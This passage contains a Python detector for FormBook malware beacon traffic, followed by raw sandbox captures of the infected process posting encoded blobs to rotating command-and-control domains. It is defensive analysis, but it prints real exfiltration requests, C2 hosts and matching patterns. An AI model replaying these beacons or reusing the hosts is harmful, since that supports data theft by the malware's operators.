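Added example, not code from the Joe Sandbox report. The FormBook samples are
trimmed copies of the captures above; the control request and the trait names
are the editor's own."""
import re
from urllib.parse import urlsplit

# Exact User-Agent sent by every request in the captured sessions.
FORMBOOK_UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36")
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")             # /8ewn/, /440l/, /8mlm/
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")  # long opaque base64-like value


def split_pairs(encoded):
    """Split 'k=v&k2=v2' without plus/percent decoding (the blobs contain '+' and '/')."""
    return [tuple(part.partition("=")[0::2]) for part in encoded.split("&") if part]


def parse_request(raw):
    """Return (method, target, headers as a lowercase-keyed dict, body) for one raw request."""
    head, _, body = raw.partition("\n\n")
    lines = head.strip("\n").split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.strip()


def formbook_indicators(raw):
    """List the traits of the captured beacon that one request matches, in a fixed order."""
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    hits = []
    if headers.get("user-agent") == FORMBOOK_UA:
        hits.append("ua")
    if headers.get("connection", "").lower() == "close":
        hits.append("conn-close")
    if PATH_RE.match(url.path):
        hits.append("short-path")
    if method == "POST":
        fields = split_pairs(body)
        if len(fields) == 1 and BLOB_RE.match(fields[0][1]):
            hits.append("single-blob-field")
        host = headers.get("host", "")
        origin = headers.get("origin", "")
        if origin == "http://" + host and headers.get("referer") == origin + url.path:
            hits.append("self-referer")
    elif method == "GET":
        params = split_pairs(url.query)
        if len(params) == 2 and any(BLOB_RE.match(v) for _, v in params):
            hits.append("get-blob-query")
    return hits


def response_kind(raw):
    """Classify the two reply types seen: bare 405, or 200 whose body only bounces to /lander."""
    status = raw.split("\n", 1)[0]
    if " 405 " in status:
        return "method-not-allowed"
    if " 200 " in status and 'window.location.href="/lander' in raw:
        return "lander-redirect"
    return "other"


# Constructed samples: trimmed copies of the report's captures (Accept header shortened).
GET_REMEDIES = "\n".join([
    "GET /8ewn/?RZ=0nkpmZbx9Z4P2&BHptZ6F=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrF"
    "HLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblKXuHNDxI7tmrBLFv1SmPdd+ShDH4FU= HTTP/1.1",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language: en-US",
    "Host: www.remedies.pro",
    "Connection: close",
    "User-Agent: " + FORMBOOK_UA,
]) + "\n\n"
POST_EGYSHARE = "\n".join([
    "POST /440l/ HTTP/1.1",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language: en-US",
    "Accept-Encoding: gzip, deflate, br",
    "Host: www.egyshare.xyz",
    "Origin: http://www.egyshare.xyz",
    "Content-Type: application/x-www-form-urlencoded",
    "Cache-Control: max-age=0",
    "Connection: close",
    "Content-Length: 204",
    "Referer: http://www.egyshare.xyz/440l/",
    "User-Agent: " + FORMBOOK_UA,
    "",
    "BHptZ6F=wvRL/7AjjEcZIJZGSHdBzUvpyCNglYOeSHE7sqJBbmpgB32PxkjHLWk3ObrEfOT/A+ewP0FGeNHrm"
    "+Iq+VfHZvt67T6W9s9riPl8mVc4FRM5bMZM9ZJX9lmLsAs3Gtp1H3P01nD+4c8bhiBrn48UjpoefUZ4BeIbq/"
    "chGzsW5+es1f1okbi4tRwI8CcdJx+HDw==",
])
# Constructed control request (hypothetical browser traffic, not from the report).
BENIGN_GET = "\n".join([
    "GET /index.html HTTP/1.1",
    "Host: www.example.com",
    "Connection: keep-alive",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0",
]) + "\n\n"
RESP_405 = "HTTP/1.1 405 Method Not Allowed\ncontent-length: 0\nconnection: close\n\n"
RESP_LANDER = ("HTTP/1.1 200 OK\ncontent-type: text/html\ncontent-length: 260\nconnection: close\n\n"
               '<!DOCTYPE html><html><head><script>window.onload=function(){'
               'window.location.href="/lander?RZ=0nkpmZbx9Z4P2"}</script></head></html>')

if __name__ == "__main__":
    for label, req in [("GET remedies.pro", GET_REMEDIES),
                       ("POST egyshare.xyz", POST_EGYSHARE), ("control", BENIGN_GET)]:
        print(f"{label:18s} {formbook_indicators(req)}")
    print(response_kind(RESP_405), response_kind(RESP_LANDER))
```

The traits are deliberately checked on the request shape rather than on the hostnames or the 13.248.169.48 / 84.32.84.32 addresses, because the sample rotates through a fresh host every fifteen seconds in the DNS log above while the request template never changes; a detection keyed on the template survives the next domain list, one keyed on these domains does not. The control request shows the hits list is empty for ordinary browser traffic, so the length of the list is usable as a score.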


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.12 | 49721 | 84.32.84.32 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:36:36.840020895 CET | 787 | OUT | POST /8mlm/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.appsolucao.shop
                                                                            Origin: http://www.appsolucao.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 204
                                                                            Referer: http://www.appsolucao.shop/8mlm/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 4f 71 47 65 65 44 47 36 74 74 6b 4e 49 59 73 6d 56 43 59 65 4b 45 4d 4f 43 77 38 55 70 4d 66 4e 6f 4d 4a 62 39 75 2f 34 7a 4c 2b 6a 47 33 61 56 34 76 6b 6c 4d 56 50 79 78 46 70 68 7a 66 46 50 50 2f 68 65 47 4a 77 75 51 70 6c 6f 45 5a 65 63 65 71 56 68 55 31 78 43 2b 77 62 4b 41 63 36 33 4e 51 6e 4a 4c 50 72 58 56 75 55 5a 34 6d 75 6d 77 44 4e 77 59 53 7a 44 36 79 74 61 58 6d 32 58 33 2b 5a 48 6e 56 46 33 74 76 77 2b 4f 53 4d 38 59 2b 67 55 38 49 55 67 34 48 31 73 46 4d 38 37 4c 6e 39 41 69 2b 41 55 64 2b 79 32 41 55 34 49 6a 36 79 5a 70 4e 6a 77 64 33 45 74 58 77 48 2f 44 77 3d 3d
                                                                            Data Ascii: BHptZ6F=OqGeeDG6ttkNIYsmVCYeKEMOCw8UpMfNoMJb9u/4zL+jG3aV4vklMVPyxFphzfFPP/heGJwuQploEZeceqVhU1xC+wbKAc63NQnJLPrXVuUZ4mumwDNwYSzD6ytaXm2X3+ZHnVF3tvw+OSM8Y+gU8IUg4H1sFM87Ln9Ai+AUd+y2AU4Ij6yZpNjwd3EtXwH/Dw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.12 | 49722 | 84.32.84.32 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:36:39.990334988 CET | 807 | OUT | POST /8mlm/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.appsolucao.shop
                                                                            Origin: http://www.appsolucao.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 224
                                                                            Referer: http://www.appsolucao.shop/8mlm/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 4f 71 47 65 65 44 47 36 74 74 6b 4e 4a 37 30 6d 53 6a 59 65 62 30 4d 52 4e 51 38 55 6a 73 66 42 6f 4d 46 62 39 73 54 6f 7a 35 4b 6a 48 56 43 56 35 75 6b 6c 4c 56 50 79 36 6c 70 75 75 76 45 42 50 2f 64 4a 47 4d 49 75 51 70 5a 6f 45 62 47 63 5a 5a 4e 69 56 6c 77 6b 31 51 62 55 45 63 36 33 4e 51 6e 4a 4c 50 75 41 56 75 63 5a 34 56 6d 6d 2f 47 74 7a 53 79 7a 4d 73 69 74 61 54 6d 32 54 33 2b 5a 68 6e 58 67 63 74 71 73 2b 4f 57 41 38 59 71 30 58 31 49 56 6c 38 48 31 79 47 5a 52 49 4d 48 74 2f 6a 64 38 71 51 76 4b 70 42 53 31 53 38 49 36 50 38 4f 33 39 51 67 39 64 61 7a 36 32 59 37 65 57 54 47 4f 4e 65 50 55 2b 72 39 6a 79 4b 32 78 68 6a 54 67 3d
                                                                            Data Ascii: BHptZ6F=OqGeeDG6ttkNJ70mSjYeb0MRNQ8UjsfBoMFb9sToz5KjHVCV5uklLVPy6lpuuvEBP/dJGMIuQpZoEbGcZZNiVlwk1QbUEc63NQnJLPuAVucZ4Vmm/GtzSyzMsitaTm2T3+ZhnXgctqs+OWA8Yq0X1IVl8H1yGZRIMHt/jd8qQvKpBS1S8I6P8O39Qg9daz62Y7eWTGONePU+r9jyK2xhjTg=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.12 | 49723 | 84.32.84.32 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:36:42.660023928 CET | 1820 | OUT | POST /8mlm/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.appsolucao.shop
                                                                            Origin: http://www.appsolucao.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 1236
                                                                            Referer: http://www.appsolucao.shop/8mlm/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36


                                                                            Session ID: 8  Source IP: 192.168.2.12  Source Port: 49724  Destination IP: 84.32.84.32  Destination Port: 80  PID: 5356  Process: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp: Dec 6, 2024 17:36:45.312066078 CET  Bytes transferred: 517  Direction: OUT  Data: GET /8mlm/?BHptZ6F=Dou+d174n903Q5s8eGVlbncTBC0Rpufru8Nex+2NzpzCLkW84PIBEnPU/VIOuudaHO13J+F+WsJAELWMIa4GeHkI0XjsMpOmPR3vOajhWYhkzVz3w31CV1o=&RZ=0nkpmZbx9Z4P2 HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.appsolucao.shop
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Timestamp: Dec 6, 2024 17:36:46.399652958 CET  Bytes transferred: 1236  Direction: IN  Data: HTTP/1.1 200 OK
                                                                            Date: Fri, 06 Dec 2024 16:36:46 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 9973
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Server: hcdn
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            x-hcdn-request-id: b62d18ce018024e44e3d29ce9446af42-bos-edge3
                                                                            Expires: Fri, 06 Dec 2024 16:36:45 GMT
                                                                            Cache-Control: no-cache
                                                                            Accept-Ranges: bytes
                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O


                                                                            Session ID: 9  Source IP: 192.168.2.12  Source Port: 49725  Destination IP: 84.32.84.32  Destination Port: 80  PID: 5356  Process: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp: Dec 6, 2024 17:36:51.862488985 CET  Bytes transferred: 787  Direction: OUT  Data: POST /3ifu/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.samundri.online
                                                                            Origin: http://www.samundri.online
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 204
                                                                            Referer: http://www.samundri.online/3ifu/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Ascii: BHptZ6F=j7AD8YqQlQOrgbyh46tVk3mower2c49vCK6Q/Z4ws4CiaKVHV39629dteIl0JvPGXTFpQxxBV67ubPpHbL8Qlik7iQb9xGVeNuE1py8wpo4TR2kLUd7ayMM6M4JtzOorYNZAEaXkE6ItVRPCZna27t3yQX8JtEph78upA2FzAL1xQ67T9pSI/pfysKZeExpZgw==


                                                                            Session ID: 10  Source IP: 192.168.2.12  Source Port: 49726  Destination IP: 84.32.84.32  Destination Port: 80  PID: 5356  Process: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp: Dec 6, 2024 17:36:54.524584055 CET  Bytes transferred: 807  Direction: OUT  Data: POST /3ifu/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.samundri.online
                                                                            Origin: http://www.samundri.online
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 224
                                                                            Referer: http://www.samundri.online/3ifu/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Ascii: BHptZ6F=j7AD8YqQlQOrm5mh/ZVVzHmr++r2Lo9rCKmQ/YN3vNaiaqFHU0l619dtG4l1NvP3XTZXQzlBV6vubKNHa8oXlykl8wb78mVeNuE1pyYKpowTRGULU87d08M5aoJtkeonYNZuEbbaE4wtVR/CY0C3u93wPn9NiEIP1NC5BGJXAJp7V82JibaeqqL/hdguJyUQ74in2zAtIo75K6BDIcpkNYA=


                                                                            Session ID: 11  Source IP: 192.168.2.12  Source Port: 49728  Destination IP: 84.32.84.32  Destination Port: 80  PID: 5356  Process: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp: Dec 6, 2024 17:36:57.195537090 CET  Bytes transferred: 1820  Direction: OUT  Data: POST /3ifu/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.samundri.online
                                                                            Origin: http://www.samundri.online
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 1236
                                                                            Referer: http://www.samundri.online/3ifu/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36


                                                                            Session ID: 12  Source IP: 192.168.2.12  Source Port: 49734  Destination IP: 84.32.84.32  Destination Port: 80  PID: 5356  Process: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp: Dec 6, 2024 17:36:59.864487886 CET  Bytes transferred: 517  Direction: OUT  Data: GET /3ifu/?BHptZ6F=u5oj/oWevlm54LOT1+Bryx675u+IDrtDZr257qJzt/2kXoBMan19x+0MdpxIfeL/WChZbD4JNYT/SNFPC81SuzkGtR7263FvFtQ21l4S/sR8VHVbXOTd4oM=&RZ=0nkpmZbx9Z4P2 HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.samundri.online
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Timestamp: Dec 6, 2024 17:37:00.952725887 CET  Bytes transferred: 1236  Direction: IN  Data: HTTP/1.1 200 OK
                                                                            Date: Fri, 06 Dec 2024 16:37:00 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 9973
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Server: hcdn
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            x-hcdn-request-id: 47587e2683e53bfde7696e37b6211972-bos-edge1
                                                                            Expires: Fri, 06 Dec 2024 16:36:59 GMT
                                                                            Cache-Control: no-cache
                                                                            Accept-Ranges: bytes
                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O


                                                                            Session ID: 13  Source IP: 192.168.2.12  Source Port: 49750  Destination IP: 209.74.77.107  Destination Port: 80  PID: 5356  Process: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
                                                                            Timestamp: Dec 6, 2024 17:37:06.896686077 CET  Bytes transferred: 781  Direction: OUT  Data: POST /4ii9/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.happyjam.life
                                                                            Origin: http://www.happyjam.life
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 204
                                                                            Referer: http://www.happyjam.life/4ii9/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 4f 41 69 66 59 57 2b 6c 50 64 46 64 6f 41 6c 67 71 4c 6e 78 35 74 65 4b 58 62 4e 49 65 53 4a 71 6a 35 6c 46 7a 57 50 35 4e 53 65 56 65 76 45 59 4d 67 43 58 4c 6a 33 34 51 42 37 37 42 2f 58 7a 46 79 62 51 49 30 43 2b 62 48 57 39 67 65 78 47 74 66 4e 30 67 6e 51 48 77 68 48 6a 57 75 78 73 6f 38 63 65 53 6c 31 47 46 39 41 42 4c 52 7a 31 2b 64 7a 55 73 47 38 45 32 57 64 44 44 56 46 43 30 34 68 45 49 62 58 46 42 55 4f 41 34 48 4e 74 39 4c 38 61 5a 35 7a 72 6e 68 46 4c 64 49 62 4b 74 55 71 37 62 63 33 49 4b 66 68 79 43 79 46 6e 48 57 61 45 77 6b 6f 44 72 51 30 77 34 4d 65 78 4e 67 3d 3d
                                                                            Data Ascii: BHptZ6F=OAifYW+lPdFdoAlgqLnx5teKXbNIeSJqj5lFzWP5NSeVevEYMgCXLj34QB77B/XzFybQI0C+bHW9gexGtfN0gnQHwhHjWuxso8ceSl1GF9ABLRz1+dzUsG8E2WdDDVFC04hEIbXFBUOA4HNt9L8aZ5zrnhFLdIbKtUq7bc3IKfhyCyFnHWaEwkoDrQ0w4MexNg==
                                                                            Dec 6, 2024 17:37:08.102135897 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 06 Dec 2024 16:37:07 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 14 | Source IP: 192.168.2.12 | Source Port: 49756 | Destination IP: 209.74.77.107 | Destination Port: 80 | PID: 5356 | Process: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe

Timestamp: Dec 6, 2024 17:37:09.570456982 CET | Bytes transferred: 801 | Direction: OUT
POST /4ii9/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.happyjam.life
Origin: http://www.happyjam.life
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Connection: close
Content-Length: 224
Referer: http://www.happyjam.life/4ii9/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Data Ascii: BHptZ6F=OAifYW+lPdFdqhVgosLxodeJb7NIXyItj5pFzXKhMgKVfNcYeUuXej34Yh7+cvWeFyXYI2G+bHS9gcpGqoZ3jXQF/BHhZOxso8ceSlhsF9YBLhj1+/LXvG8L/2dDUFFe04hiIaaSBX2A4Cxt8a8ZXJygpBFAW6DG1lenY+jdUaF3D0I9YkSSln8OmHNA1Pj4Wkw2i5c4y5TRC+1EUhlhcLI=

Timestamp: Dec 6, 2024 17:37:10.795449018 CET | Bytes transferred: 533 | Direction: IN
HTTP/1.1 404 Not Found
Date: Fri, 06 Dec 2024 16:37:10 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 15 | Source IP: 192.168.2.12 | Source Port: 49767 | Destination IP: 209.74.77.107 | Destination Port: 80 | PID: 5356 | Process: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe

Timestamp: Dec 6, 2024 17:37:12.246458054 CET | Bytes transferred: 1814 | Direction: OUT
POST /4ii9/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.happyjam.life
Origin: http://www.happyjam.life
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Connection: close
Content-Length: 1236
Referer: http://www.happyjam.life/4ii9/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Data Ascii: BHptZ6F= [TRUNCATED]

Timestamp: Dec 6, 2024 17:37:13.493470907 CET | Bytes transferred: 533 | Direction: IN
HTTP/1.1 404 Not Found
Date: Fri, 06 Dec 2024 16:37:13 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 16 | Source IP: 192.168.2.12 | Source Port: 49772 | Destination IP: 209.74.77.107 | Destination Port: 80 | PID: 5356 | Process: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe

